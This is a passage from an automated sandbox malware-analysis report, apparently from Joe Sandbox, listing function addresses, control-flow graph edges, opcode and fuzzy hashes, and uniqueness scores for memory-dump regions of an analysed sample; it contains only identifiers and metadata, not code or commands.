7ffd9b89bb05-7ffd9b89bb0d 1187->1189 1190 7ffd9b89bb00 1187->1190 1189->1186 1190->1189 1192->1153
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ae113c861d4a671442e8b5641bd154ef4ca2612a7dd5517628363d0991f90800
                                                                                                                                      • Instruction ID: 22419547660759bbe433860cdf8173a789fd2b94bd57b3406d341a6ece332963
                                                                                                                                      • Opcode Fuzzy Hash: ae113c861d4a671442e8b5641bd154ef4ca2612a7dd5517628363d0991f90800
                                                                                                                                      • Instruction Fuzzy Hash: 1EC1DB70E0991D8FDFA8DF58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89ACC2 Relevance: .3, Instructions: 316COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1194 7ffd9b89acc2-7ffd9b89ad4f 1203 7ffd9b89b137-7ffd9b89b13d 1194->1203 1204 7ffd9b89ad54-7ffd9b89add4 1203->1204 1205 7ffd9b89b143-7ffd9b89b187 call 7ffd9b89c00a 1203->1205 1214 7ffd9b89add6-7ffd9b89ade2 1204->1214 1215 7ffd9b89ae04-7ffd9b89ae13 1204->1215 1227 7ffd9b89b192-7ffd9b89b21b 1205->1227 1222 7ffd9b89ae31-7ffd9b89ae39 1214->1222 1223 7ffd9b89ade4-7ffd9b89adf9 1214->1223 1218 7ffd9b89ae15 1215->1218 1219 7ffd9b89ae1a-7ffd9b89ae29 1215->1219 1218->1219 1220 7ffd9b89ae2b-7ffd9b89ae2c 1219->1220 1221 7ffd9b89ae3e-7ffd9b89ae59 1219->1221 1220->1222 1225 7ffd9b89ae79-7ffd9b89b0dd 1221->1225 1226 7ffd9b89ae5b-7ffd9b89ae75 1221->1226 1224 7ffd9b89b116-7ffd9b89b134 1222->1224 1223->1215 1224->1203 1233 7ffd9b89b12c-7ffd9b89b134 1225->1233 1234 7ffd9b89b0df-7ffd9b89b10b 1225->1234 1226->1225 1238 7ffd9b89b221-7ffd9b89b2aa 1227->1238 1239 7ffd9b89b2b3-7ffd9b89b2d5 1227->1239 1233->1203 1234->1224 1238->1239 1260 7ffd9b89b2ac 1238->1260 1244 7ffd9b89b426-7ffd9b89b4bc 1239->1244 1245 7ffd9b89b2db-7ffd9b89b326 1239->1245 1263 7ffd9b89b57f-7ffd9b89b5c5 1244->1263 1264 7ffd9b89b4c2-7ffd9b89b4ce 1244->1264 1254 7ffd9b89b40d-7ffd9b89b41a 1245->1254 1255 7ffd9b89b32b-7ffd9b89b339 1254->1255 1256 7ffd9b89b420-7ffd9b89b421 1254->1256 1261 7ffd9b89b33b 1255->1261 1262 7ffd9b89b340-7ffd9b89b3a2 1255->1262 1259 7ffd9b89b734-7ffd9b89b793 1256->1259 1280 7ffd9b89ba5b-7ffd9b89ba88 1259->1280 1260->1239 1261->1262 1269 7ffd9b89b3a9-7ffd9b89b3fb 1262->1269 1270 7ffd9b89b3a4 1262->1270 1279 7ffd9b89b5cc-7ffd9b89b5d2 1263->1279 1271 7ffd9b89b51d-7ffd9b89b57d call 7ffd9b899a58 1264->1271 1272 7ffd9b89b4d0-7ffd9b89b51c 1264->1272 1294 7ffd9b89b405-7ffd9b89b40a 1269->1294 1295 7ffd9b89b3fd-7ffd9b89b402 1269->1295 1270->1269 1271->1279 1272->1271 1283 7ffd9b89b721-7ffd9b89b72e 1279->1283 1291 7ffd9b89b798-7ffd9b89b7d4 1280->1291 1292 7ffd9b89ba8e-7ffd9b89bab2 call 7ffd9b89c043 1280->1292 1283->1259 1286 7ffd9b89b5d7-7ffd9b89b5e5 1283->1286 1288 7ffd9b89b5e7 1286->1288 1289 7ffd9b89b5ec-7ffd9b89b646 1286->1289 1288->1289 1305 7ffd9b89b6b6-7ffd9b89b6de 1289->1305 1306 7ffd9b89b648-7ffd9b89b670 1289->1306 1300 7ffd9b89b7d6-7ffd9b89b7ed 1291->1300 1301 7ffd9b89b7f1-7ffd9b89ba58 1291->1301 1310 7ffd9b89babb-7ffd9b89baef 1292->1310 1311 7ffd9b89bab4 1292->1311 1294->1254 1295->1294 1300->1301 1301->1280 1312 7ffd9b89b6e5-7ffd9b89b70e 1305->1312 1313 7ffd9b89b6e0 1305->1313 1308 7ffd9b89b677-7ffd9b89b6b4 1306->1308 1309 7ffd9b89b672 1306->1309 1322 7ffd9b89b719-7ffd9b89b71e 1308->1322 1309->1308 1316 7ffd9b89bb0f-7ffd9b89bb35 1310->1316 1317 7ffd9b89baf1-7ffd9b89bafe 1310->1317 1311->1310 1312->1322 1313->1312 1319 7ffd9b89bb05-7ffd9b89bb0d 1317->1319 1320 7ffd9b89bb00 1317->1320 1319->1316 1320->1319 1322->1283
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6925ca86e1ae42e19f03edc71f9ff856326cced661a5411f91b260d6935f901d
                                                                                                                                      • Instruction ID: 38e3947e7aaa63ce2fd7033245133ef9809cb23a9e1c5f3d5031b592c74a4d0e
                                                                                                                                      • Opcode Fuzzy Hash: 6925ca86e1ae42e19f03edc71f9ff856326cced661a5411f91b260d6935f901d
                                                                                                                                      • Instruction Fuzzy Hash: F4C1EA70A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF04 Relevance: .3, Instructions: 303COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 42d69df43c60539ba7fdc93aac89cde28421b04ec0c2da2828808ca742a3d18a
                                                                                                                                      • Instruction ID: a27171380b18f89333bb5026def70121553d1eda4cf468069359bb7017b43b77
                                                                                                                                      • Opcode Fuzzy Hash: 42d69df43c60539ba7fdc93aac89cde28421b04ec0c2da2828808ca742a3d18a
                                                                                                                                      • Instruction Fuzzy Hash: D9C1C970A0991D8FDFA8DB58C894BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AE9C Relevance: .3, Instructions: 301COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3e3cab8700e015eee16205c7fcf4d7b2f5cfaf9dd97bb674a3d13b938b29adab
                                                                                                                                      • Instruction ID: 826abfd9411d76d54d9320907293afee73723ab2d3ac9ae719d37eee8e7b05d7
                                                                                                                                      • Opcode Fuzzy Hash: 3e3cab8700e015eee16205c7fcf4d7b2f5cfaf9dd97bb674a3d13b938b29adab
                                                                                                                                      • Instruction Fuzzy Hash: 17C1C970A0991D8FDFA8DB58C894BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF86 Relevance: .3, Instructions: 296COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f43f0a0e1ddd621efe3e5ecdb84af2e9266e1f72460c1c8e6c4a656157e1662e
                                                                                                                                      • Instruction ID: 5b229a28adfa3457ec27637ec0b291e9ac61dce3f92d7c2a82ce228f3f31c07f
                                                                                                                                      • Opcode Fuzzy Hash: f43f0a0e1ddd621efe3e5ecdb84af2e9266e1f72460c1c8e6c4a656157e1662e
                                                                                                                                      • Instruction Fuzzy Hash: 32C1CC70A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89AF99 Relevance: .3, Instructions: 292COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 25a7d44db358d0045f4c8d20766f5a9a9ded6ba6272d73dd81656f74a5fc08ce
                                                                                                                                      • Instruction ID: 9bbf80e22f0804b26ec1d4ee89d197b0d303d5a92e4423b4fcda1c99504ff413
                                                                                                                                      • Opcode Fuzzy Hash: 25a7d44db358d0045f4c8d20766f5a9a9ded6ba6272d73dd81656f74a5fc08ce
                                                                                                                                      • Instruction Fuzzy Hash: 84B1BB70A0991D8FDFA8DB58C895BA9B7B1FF98301F1141A9D00DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9DAD Relevance: .3, Instructions: 269COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 91bd665c07aaade8aaa53e646f55d8fe5f034b1737d29798b2cbd00713eb5c7d
                                                                                                                                      • Instruction ID: 00fa95ccffa5eef4c3c9cc956d4000fbd9b26cdb132fad1ad62ab81d9b88d5a4
                                                                                                                                      • Opcode Fuzzy Hash: 91bd665c07aaade8aaa53e646f55d8fe5f034b1737d29798b2cbd00713eb5c7d
                                                                                                                                      • Instruction Fuzzy Hash: EAA1E870A09A1D8FDB94EF68C8A4BA9B7F2FF58304F5044A9D01DD7296DB34A981CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9E48 Relevance: .2, Instructions: 172COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5d60b4e9181ac99c7b6fc365de8547c93e0c629678032db144983889ddac0ad7
                                                                                                                                      • Instruction ID: 1b7bcbf4d43c9bd6cd8fa6aabe4ed9abee412e4099ccb63feba6e61ee475c709
                                                                                                                                      • Opcode Fuzzy Hash: 5d60b4e9181ac99c7b6fc365de8547c93e0c629678032db144983889ddac0ad7
                                                                                                                                      • Instruction Fuzzy Hash: 5B61C870A0592D8FDF94EF68C8A4BA9B7F1FF58304F5040A9D01DE72A6CA34A981CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B3000 Relevance: .2, Instructions: 162COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d2eec0e5f38575759619111fe324b1812bb89ee6c57ec22a8b0ea499258e1f11
                                                                                                                                      • Instruction ID: 8cfa5ff174b82a977abe9f964be0a4e80c754aae1363ade7128d79284a9909f4
                                                                                                                                      • Opcode Fuzzy Hash: d2eec0e5f38575759619111fe324b1812bb89ee6c57ec22a8b0ea499258e1f11
                                                                                                                                      • Instruction Fuzzy Hash: 8451027288E7C55FD7038BB09D616D03FF0AF17214B0A05DBD484CB0A3E26C5A4ADB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8886A0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3fe23f8a7935464af1cff791841437f46da635383c7fd3c4b21c7ef3006cfb3c
                                                                                                                                      • Instruction ID: fa710a6c155ef48e328098bf299888482816ae9e3c16a9f5691f1d156573906d
                                                                                                                                      • Opcode Fuzzy Hash: 3fe23f8a7935464af1cff791841437f46da635383c7fd3c4b21c7ef3006cfb3c
                                                                                                                                      • Instruction Fuzzy Hash: BA51C670A1995D8FEBA0EB18C894BE9B7F1FF58301F4001EA915DD7262DA746AC5CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B897039 Relevance: .1, Instructions: 138COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 420652084dbf2909a47fe9ce226466ed4d4232f9f5b4f60378424e30c9027eed
                                                                                                                                      • Instruction ID: 6f81993d50899f45081c37891edcb734b99e5e39cd5f5d10ac754332d515fbc0
                                                                                                                                      • Opcode Fuzzy Hash: 420652084dbf2909a47fe9ce226466ed4d4232f9f5b4f60378424e30c9027eed
                                                                                                                                      • Instruction Fuzzy Hash: 7551A034A09A4D9FCF84EF98D894AED7BF1FF58310B0501A6E409E7261D734E990CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA8A5 Relevance: .1, Instructions: 135COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: afb5550cd8eb573a4e75ec2b0e6477604cf8d5b40cf334cbc2e744a28384db45
                                                                                                                                      • Instruction ID: 381379a5402ba1cc70f34b077666c6498822c2172b472d7dd31ac69faa9cca32
                                                                                                                                      • Opcode Fuzzy Hash: afb5550cd8eb573a4e75ec2b0e6477604cf8d5b40cf334cbc2e744a28384db45
                                                                                                                                      • Instruction Fuzzy Hash: 0251F670E0961D8FEB65EBA4D8A57EDB7B1FF58300F1101AAD01DA3296DE346A81CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CAB14 Relevance: .1, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 40cd6e6e2729cd44d5c2ae2ad0379b873383d5194bec7ce7de4f877462f43922
                                                                                                                                      • Instruction ID: 3bbfa8a849ced694c7c356c4a77306750f18d5a5acced094d102dd696e2947e3
                                                                                                                                      • Opcode Fuzzy Hash: 40cd6e6e2729cd44d5c2ae2ad0379b873383d5194bec7ce7de4f877462f43922
                                                                                                                                      • Instruction Fuzzy Hash: 9351E5B0E0961D8FEB64EB94D8A57FDB7B1FF18300F2041AAD01DA7295DA746A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CAB84 Relevance: .1, Instructions: 102COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f0f6a097ab3ebebaa373d9c96c9b453785fcccb6601690c6e84302ad73120955
                                                                                                                                      • Instruction ID: 14a051e7d4acbae6e038374ecb7b77d3a074c52700afea6c2e46da691ffa4110
                                                                                                                                      • Opcode Fuzzy Hash: f0f6a097ab3ebebaa373d9c96c9b453785fcccb6601690c6e84302ad73120955
                                                                                                                                      • Instruction Fuzzy Hash: 2C41D870E1561D8FDB69EF94D8A5BEDB7B1FF18300F1001AAD01DA3296DA746A81CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF3D0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a6e196c821ec72b5b33e0328682ae0157097f4b0acaa3df118271f788a5bdb98
                                                                                                                                      • Instruction ID: d0a3a3b225f56072c0cbdc4df5c164d844658b65c85a3d9158c9f6a3cd978b68
                                                                                                                                      • Opcode Fuzzy Hash: a6e196c821ec72b5b33e0328682ae0157097f4b0acaa3df118271f788a5bdb98
                                                                                                                                      • Instruction Fuzzy Hash: 14316C71E0A50D8BEB24EB84D854BFDB7B5EB59310F21427AD009D3295CF786A898B81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896CC9 Relevance: .1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction ID: 615a9b38052f005ffd7c29a6b748a9890ba235b13362755324c61ec293264abd
                                                                                                                                      • Opcode Fuzzy Hash: 1aa1a8c7ac11decc1bbf8afaaa35014846d66d2317917ec153cdc162e36e43f8
                                                                                                                                      • Instruction Fuzzy Hash: 57317C70A0964E8FDF54DF58C8A4AED7BB1FF48344F06026AE859E3291CB34A941CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8889DC Relevance: .1, Instructions: 90COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b5fd85f89e0a5f92e0a7c305ecd6daf52fac2ab16e9809a7e377e8f73aa78f49
                                                                                                                                      • Instruction ID: d04b489ba9ca48700b699481b6c5e3b8adade4defd19427cf82a41642578f8b4
                                                                                                                                      • Opcode Fuzzy Hash: b5fd85f89e0a5f92e0a7c305ecd6daf52fac2ab16e9809a7e377e8f73aa78f49
                                                                                                                                      • Instruction Fuzzy Hash: 06319BB1A0991C8FDFA8DF14C855AE9B3B1FB68305F1041EE810EE32A5CB759A81CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B880C2D Relevance: .1, Instructions: 85COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b1f622d7e59b755dd9ab78132e7f8a065e225ac74a20960239c115fcab38dabf
                                                                                                                                      • Instruction ID: 925516a7c88a49b48abef2cbc6c15947ffe620ffd41dd622ff9d2f4e4215a845
                                                                                                                                      • Opcode Fuzzy Hash: b1f622d7e59b755dd9ab78132e7f8a065e225ac74a20960239c115fcab38dabf
                                                                                                                                      • Instruction Fuzzy Hash: EC310871E1DA8E8FE7229BA8C8212BD7BB1EF49310F060577D465DB1E2CA382609C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B899C08 Relevance: .1, Instructions: 78COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction ID: a41b5f7eb359129346f9df0357e569375c61f8cc0c0d94b2c0beea93d1abd82d
                                                                                                                                      • Opcode Fuzzy Hash: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction Fuzzy Hash: DC315C31A0F64E8FEB21DBA4C9642ED7BB1FF19300F1105B6E409E61E2DA786E18C755
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89797D Relevance: .1, Instructions: 73COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction ID: 87b3640d0eb154842936b6571defd6b63e5e68ef3b84a7edec6e99976d692abf
                                                                                                                                      • Opcode Fuzzy Hash: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction Fuzzy Hash: DC219F31A1965D8FDF19DF58C8616EDB7B1FB59310F01023AD40AD3291DB78A915CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88D212 Relevance: .1, Instructions: 72COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction ID: 56f8cc8c88a342abc88996c65922bf3588a34b89148783783fbe75b9eb0b88f8
                                                                                                                                      • Opcode Fuzzy Hash: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
